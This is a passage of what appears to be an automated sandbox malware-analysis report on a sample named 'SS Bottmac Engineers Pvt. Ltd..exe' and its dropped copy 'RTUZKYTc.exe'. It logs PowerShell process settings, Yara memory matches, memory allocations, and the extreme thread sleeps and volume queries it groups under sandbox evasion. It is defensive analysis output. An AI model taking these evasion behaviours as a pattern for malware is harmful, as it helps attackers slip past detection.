              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara matchFile source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 5148, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RTUZKYTc.exe PID: 7324, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 1992, type: MEMORYSTR
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 1760000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 3130000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 5130000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 9470000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: A470000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: A680000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: B680000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: BAE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: CAE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: DAE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 3340000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 5340000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 1240000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 1480000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 8CC0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 9CC0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 9EB0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: AEB0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: B340000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: C340000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: D340000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 1290000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 2C30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 2A50000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 1640000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 3110000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 2F10000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 8F00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 7AB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 9F00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: AF00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: B530000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: C530000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: C20000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 2950000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 26C0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 1770000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 3500000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 1890000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 9080000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 7BF0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: A080000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: B080000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: B660000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: C660000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: D660000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: F10000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 2B50000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 11B0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4111Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 795Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6522Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1366Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWindow / User API: threadDelayed 2887Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWindow / User API: threadDelayed 6926Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7918
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1704
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8827
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 650
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7198
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2461
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 1892 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200 Thread sleep count: 4111 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172 Thread sleep count: 795 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304 Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 7136 Thread sleep count: 32 > 30
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 7136 Thread sleep time: -29514790517935264s >= -30000s
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 3720 Thread sleep count: 2887 > 30
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 3720 Thread sleep count: 6926 > 30
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe TID: 7432 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7632 Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe TID: 7764 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880 Thread sleep count: 8827 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880 Thread sleep count: 650 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7912 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8180 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 7204 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 7244 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 6148 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 7584 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe File Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe File Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe File Volume queried: C:\ FullSizeInformation
